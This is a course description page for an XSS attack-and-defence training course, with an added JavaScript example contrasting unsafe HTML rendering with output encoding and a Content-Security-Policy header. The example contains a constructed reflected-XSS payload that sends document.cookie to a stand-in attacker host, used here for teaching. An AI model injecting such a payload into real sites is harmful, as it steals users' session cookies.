Learning Path: Application Security Essentials

Attacking and Defending Cross-Site Scripting (XSS)

Client-side attacks differ from server-side ones in where the malicious code runs: the payload executes in the victim's browser, under the application's origin, rather than on the server. That creates a different set of problems for security teams, and it forces developers to rethink remediation, because server-side checks alone do not decide what the browser will interpret as script.

In this course, we look exclusively at Cross-Site Scripting (XSS) attacks and why they matter. We start with an introduction to client-side attacks and how they have evolved since the days of the MySpace worm (2005). You'll learn about the different types of XSS attacks as well as the most popular strategies and exploits used by attackers.

In the next couple of modules, hands-on lab exercises let you simulate and run XSS attacks against applications. We follow this with defensive countermeasures, using tried-and-tested methods for securing apps against these attacks.
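As an added illustration of the attack-then-defend flow described above (this is example code written for this page, not material from the course or its labs), the snippet below shows a server-rendered greeting that reflects untrusted input straight into HTML, the same template with context-aware output encoding applied, and a Content-Security-Policy value the hardened page could send as a second layer. The function names, the payload and the `attacker.example` host are constructed for illustration.

```javascript
// Added example: reflected XSS in a server-rendered greeting, and the
// output encoding that neutralises it. Names and the payload are
// constructed for illustration; this is not code from the course.

// Vulnerable: untrusted input is concatenated directly into HTML. The
// browser cannot distinguish the attacker's markup from the page's own,
// so an injected <script> runs with the site's origin.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// HTML-encode the five characters that can change parser state in an
// HTML text or quoted-attribute context. This is output encoding, not
// input validation: the data is stored unchanged and made safe for the
// sink it is written into.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same template, with the input encoded for the HTML text
// context it lands in.
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Constructed payload of the classic reflected-XSS shape: it closes the
// surrounding element, injects a script that exfiltrates document.cookie
// to a hypothetical attacker host, and re-opens a <p> so the page still
// renders normally.
const PAYLOAD =
  '</p><script>location="https://attacker.example/?c="+document.cookie</script><p>';

// A Content-Security-Policy the hardened page could send in addition to
// encoding: no inline script, scripts only from the page's own origin,
// and no plugins or <base> hijacking. Encoding stops the injection;
// CSP limits the damage if an encoding gap is ever missed.
const CSP_HEADER = "script-src 'self'; object-src 'none'; base-uri 'none'";

// Crude check used only to contrast the two renderings: does the output
// contain a real <script> start tag (as opposed to the escaped text
// "&lt;script&gt;", which the browser displays rather than executes)?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Usage: compare what the browser would receive in each case.
console.log("unsafe :", renderGreetingUnsafe(PAYLOAD));
console.log("safe   :", renderGreetingSafe(PAYLOAD));
console.log("CSP    :", CSP_HEADER);
```

Note that `escapeHtml` is only correct for HTML text and quoted-attribute contexts; data written into a JavaScript string, a URL, or a CSS value needs the encoding rules of that context, which is what the course's "Popular XSS Attacks" and validation modules cover.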

A majority of your learning is practical, using labs that simulate realistic environments. This gives you the opportunity to learn first-hand the AppSec strategies you will use to secure web applications. By the end of this course, you'll have in-depth, hands-on knowledge of how Cross-Site Scripting works and how to deal with real-world attack scenarios.

Proficiency: Beginner
Audience: Application Security
Course Duration: 4 hours
19 lessons
5 Cloud Labs

Course Outline

  • Course Introduction
  • Course Pre-requisites
  • XSS – Introduction and Overview
  • XSS – Types of Attacks
  • Popular XSS Attacks
  • Content-Security-Policy: An Introduction
  • Bypassing Content-Security-Policy
  • Advanced Controls: Content-Security-Policy
  • Introduction to Input Validation
  • Validation Approaches – Part 1
  • Validation Approaches – Part 2
  • Validating Serialized Datasets: JSON